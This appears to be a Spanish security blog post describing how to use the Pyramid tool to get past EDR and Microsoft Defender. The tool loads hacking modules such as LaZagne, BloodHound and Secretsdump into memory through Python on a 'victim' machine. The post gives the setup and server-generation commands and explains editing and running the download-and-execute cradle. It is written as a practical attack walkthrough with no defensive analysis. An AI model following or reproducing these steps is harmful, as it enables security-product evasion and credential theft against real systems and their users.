viernes, 14 de abril de 2023

Pyramid para bypass de EDR mediante carga dinámica de módulos en Python. Ejemplo Lazagne

 Estimados amigos de Inseguros !!!

En la aventura de hoy vamos a trabajar con una aplicación muy interesante, Pyramid, que desarrolla un concepto de evasión de EDR que me gusta mucho. Aprovechar el beneplácito que pueda tener el binario Python.exe en los distintos motores de detección para "inyectar" comandos de herramientas conocidas en el hacking, como puedan ser Bloodhound, Mimi o Lazagne.


La solución presentada ofrece un servidor web para hacer el "delivery" de los ficheros, cifrados para mejorar la no-detección, un conjunto de módulos que se pueden cargar en memoria, los programas de hacking que queremos ejecutar, y un cliente que ejecutar las instrucciones en nuestro equipo víctima.

Tiene varios módulos, interesantes, Secretsdump de Impacket... una shell, código .net... una maravilla  !!

El proceso de instalación es muy sencillo. 


git clone https://github.com/naksyn/Pyramid

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365

python3 pyramid.py -p 443 -ssl -u testuser -pass Sup3rP4ss! -enc "chacha20" -passenc "TestPass1" -server "192.168.1.2" -generate

Con este ejemplo, podemos descargar el cliente con la información ya presentada, un ahorro el no tener que escribirlo :-) Nos bajamos cradle.py

Por defecto el entorno va a ejecutar pyramid_module='mod-bh.py', podemos cambiarlo por ejemplo para usar Lazagne cambiando en cradle.py el modulo por mod-LaZagne.py, o cualquiera de los que trae de casa.

Ejecutamos python cradle.py en la víctima y voila !!


Con defender encendido ejecutamos Lazagne...

Podemos hacer uso de Python Embebido, si el cliente no tiene instalado python 3.10... en su dc xD 

El propio autor nos complace con un post extenso explicando algunos conceptos interesantes de evasión de EDR, en este documento, por si quieres bajar un poquito más.

Gracias por leerme. Recuerda que estamos haciendo cosas chulas en formacion.seguridadsi.com con varios cursos de Ciberseguridad Microsoft, Azure, etc. date una vuelta, hay cursos gratuitos !!! 

El próximo curso presencial-online es el de Seguridad en Azure y O365.